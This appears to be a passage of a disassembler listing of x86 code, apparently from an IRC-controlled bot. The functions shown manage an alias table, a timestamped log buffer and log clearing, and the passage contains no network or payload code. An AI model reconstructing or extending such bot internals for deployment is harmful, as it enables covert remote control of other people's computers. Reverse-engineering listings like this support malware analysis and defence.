jnz short loc_401ADE
push ebx
push [ ebp + 74h + var_94 ]
lea eax, [ ebp + 74h + var_80 ]
push eax
lea eax, [ ebp + 74h + var_1BC ]
push eax
push [ ebp + 74h + var_BC ]
call sub_4045DD
add esp, 14h
loc_401ADE: ; CODE XREF: sub_4018D1 + 1F1�j
lea eax, [ ebp + 74h + var_80 ]
push eax
call sub_401C33
mov eax, [ ebp + 74h + var_AC ]
mov dword_42D704[ eax * 8 ], ebx
mov [ esp + 290h + var_304 ], 0BB8h
call esi ; Sleep
push 9
call sub_4110DA
cmp eax, 1
pop ecx
jnz short loc_401B12
push offset dword_42E6A0
call ds:dword_41F024 ; RtlDeleteCriticalSection
loc_401B12: ; CODE XREF: sub_4018D1 + 234�j
push [ ebp + 74h + var_AC ]
call sub_4111AE
pop ecx
push ebx
call ds:dword_41F014 ; ExitThread
int 3 ; Trap to Debugger
sub_4018D1 endp ; sp - analysis failed
########################## SUBROUTINE ##########################
sub_401B23 proc near ; CODE XREF: sub_4078FA + 32B1�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
xor ebx, ebx
mov edi, offset dword_479030
loc_401B2D: ; CODE XREF: sub_401B23 + 4D�j
cmp byte ptr [ edi ], 0
jz short loc_401B74
mov esi, [ esp + 0Ch + arg_0 ]
mov eax, edi
loc_401B38: ; CODE XREF: sub_401B23 + 31�j
mov dl, [ eax ]
mov cl, dl
cmp dl, [ esi ]
jnz short loc_401B5A
test cl, cl
jz short loc_401B56
mov dl, [ eax + 1 ]
mov cl, dl
cmp dl, [ esi + 1 ]
jnz short loc_401B5A
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_401B38
loc_401B56: ; CODE XREF: sub_401B23 + 1F�j
xor eax, eax
jmp short loc_401B5F
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_401B5A: ; CODE XREF: sub_401B23 + 1B�j
; sub_401B23 + 29�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_401B5F: ; CODE XREF: sub_401B23 + 35�j
test eax, eax
jz short loc_401B74
add edi, 0B8h
inc ebx
cmp edi, offset dword_479BB0
jl short loc_401B2D
jmp short loc_401BB5
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_401B74: ; CODE XREF: sub_401B23 + D�j
; sub_401B23 + 3E�j
mov esi, ebx
imul esi, 0B8h
push 2Eh
pop ecx
push 17h
push [ esp + 10h + arg_0 ]
lea edx, dword_479030[ esi ]
xor eax, eax
mov edi, edx
push edx
rep stosd
call sub_412C40
push 9Fh
push [ esp + 1Ch + arg_4 ]
lea eax, dword_479048[ esi ]
push eax
call sub_412C40
add esp, 18h
inc dword_42B280
loc_401BB5: ; CODE XREF: sub_401B23 + 4F�j
pop edi
pop esi
mov eax, ebx
pop ebx
retn
sub_401B23 endp
########################## SUBROUTINE ##########################
sub_401BBB proc near ; CODE XREF: sub_4078FA + 461E�p
var_200 = byte ptr - 200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
push esi
push edi
push 0
push [ ebp + arg_8 ]
push offset aAliasList ; \" - [ Alias List ] - \"
push [ ebp + arg_4 ]
push [ ebp + arg_0 ]
call sub_4045DD
add esp, 14h
xor edi, edi
mov esi, offset dword_479030
loc_401BE5: ; CODE XREF: sub_401BBB + 72�j
cmp byte ptr [ esi ], 0
jz short loc_401C20
lea eax, [ esi + 18h ]
push eax
push esi
push edi
push offset aD_SS ; \"%d. %s = %s\"
lea eax, [ ebp + var_200 ]
push 200h
push eax
call sub_412E0D
push 1
push [ ebp + arg_8 ]
lea eax, [ ebp + var_200 ]
push eax
push [ ebp + arg_4 ]
push [ ebp + arg_0 ]
call sub_4045DD
add esp, 2Ch
loc_401C20: ; CODE XREF: sub_401BBB + 2D�j
add esi, 0B8h
inc edi
cmp esi, offset dword_479BB0
jl short loc_401BE5
pop edi
pop esi
leave
retn
sub_401BBB endp
########################## SUBROUTINE ##########################
sub_401C33 proc near ; CODE XREF: sub_401000 + BE�p
; sub_4010CA + 6D�p ...
var_10 = word ptr - 10h
var_E = word ptr - 0Eh
var_A = word ptr - 0Ah
var_8 = word ptr - 8
var_6 = word ptr - 6
var_4 = word ptr - 4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
lea eax, [ ebp + var_10 ]
push eax
call ds:dword_41F028 ; GetLocalTime
mov ebx, offset dword_432FB8
mov edi, 80h
mov esi, offset dword_42EFB8
loc_401C55: ; CODE XREF: sub_401C33 + 3D�j
cmp byte ptr [ ebx ], 0
jz short loc_401C6C
push 7Fh
lea eax, [ ebx + 80h ]
push ebx
push eax
call sub_412C40
add esp, 0Ch
loc_401C6C: ; CODE XREF: sub_401C33 + 25�j
sub ebx, edi
cmp ebx, esi
jge short loc_401C55
push [ ebp + arg_0 ]
movzx eax, [ ebp + var_4 ]
push eax
movzx eax, [ ebp + var_6 ]
push eax
movzx eax, [ ebp + var_8 ]
push eax
movzx eax, [ ebp + var_10 ]
push eax
movzx eax, [ ebp + var_A ]
push eax
movzx eax, [ ebp + var_E ]
push eax
push offset a_2d_2d4d_2d_2d ; \"[ %.2d - %.2d - %4d %.2d:%.2d:%.2d ] %s\"
push edi
push esi
call sub_412E0D
add esp, 28h
pop edi
pop esi
pop ebx
leave
retn
sub_401C33 endp
########################## SUBROUTINE ##########################
sub_401CA7 proc near ; CODE XREF: sub_40779B + A4�p
; sub_4078FA:loc_40A8FB�p ...
var_80 = byte ptr - 80h
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 80h
lea eax, [ ebp + arg_4 ]
push eax
push [ ebp + arg_0 ]
lea eax, [ ebp + var_80 ]
push 80h
push eax
call sub_412E64
lea eax, [ ebp + var_80 ]
push eax
call sub_401C33
add esp, 14h
leave
retn
sub_401CA7 endp
########################## SUBROUTINE ##########################
sub_401CD3 proc near ; CODE XREF: sub_4078FA + 4512�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, offset dword_42EFB8
xor ecx, ecx
loc_401CDA: ; CODE XREF: sub_401CD3 + 13�j
mov [ eax ], cl
add eax, 80h
cmp eax, offset dword_432FB8
jl short loc_401CDA
cmp [ esp + arg_C ], ecx
push esi
mov esi, offset aLogsCleared_ ; \"[ LOGS ]: Cleared.\"
jnz short loc_401D0A
push ecx
push [ esp + 8 + arg_8 ]
push esi
push [ esp + 10h + arg_4 ]
push [ esp + 14h + arg_0 ]
call sub_4045DD
add esp, 14h
loc_401D0A: ; CODE XREF: sub_401CD3 + 1F�j
push esi
call sub_401C33
pop ecx
pop esi
retn
sub_401CD3 endp
########################## SUBROUTINE ##########################
sub_401D13 proc near ; CODE XREF: .text:0041296D�p
arg_0 = dword ptr 4
push esi
mov esi, offset dword_42EFB8
loc_401D19: ; CODE XREF: sub_401D13 + 27�j
cmp byte ptr [ esi ], 0
jz short loc_401D2E
push [ esp + 4 + arg_0 ]
push esi
call sub_405AD5
test eax, eax
pop ecx
pop ecx
jnz short loc_401D40
loc_401D2E: ; CODE XREF: sub_401D13 + 9�j
add esi, 80h
cmp esi, offset dword_432FB8
jl short loc_401D19
xor eax, eax
pop esi
retn
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_401D40: ; CODE XREF: sub_401D13 + 19�j
xor eax, eax
inc eax
pop esi
retn
sub_401D13 endp
########################## SUBROUTINE ##########################
sub_401D45 proc near ; DATA XREF: sub_4078FA + 45C9�o
var_31C = byte ptr - 31Ch
var_11C = dword ptr - 11Ch
var_118 = byte ptr - 118h
var_98 = byte ptr - 98h
var_18 = dword ptr - 18h
var_14 = dword ptr - 14h
var_10 = dword ptr - 10h
var_8 = dword ptr - 8
var_4 = dword ptr - 4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 31Ch
mov eax, [ ebp + arg_0 ]
push esi
push edi
push 45h
pop ecx
mov esi, eax
lea edi, [ ebp + var_11C ]
rep movsd
xor edi, edi
xor edx, edx
inc edi
cmp [ ebp + var_10 ], edx
mov [ ebp + var_8 ], 80h
mov [ ebp + var_4 ], edx
mov [ eax + 110h ], edi
jnz short loc_401D98
push edx
push [ ebp + var_14 ]
lea eax, [ ebp + var_118 ]
push offset aLogBegin ; \"[ LOG ]: Begin\"
push eax
push [ ebp + var_11C ]
call sub_4045DD
add esp, 14h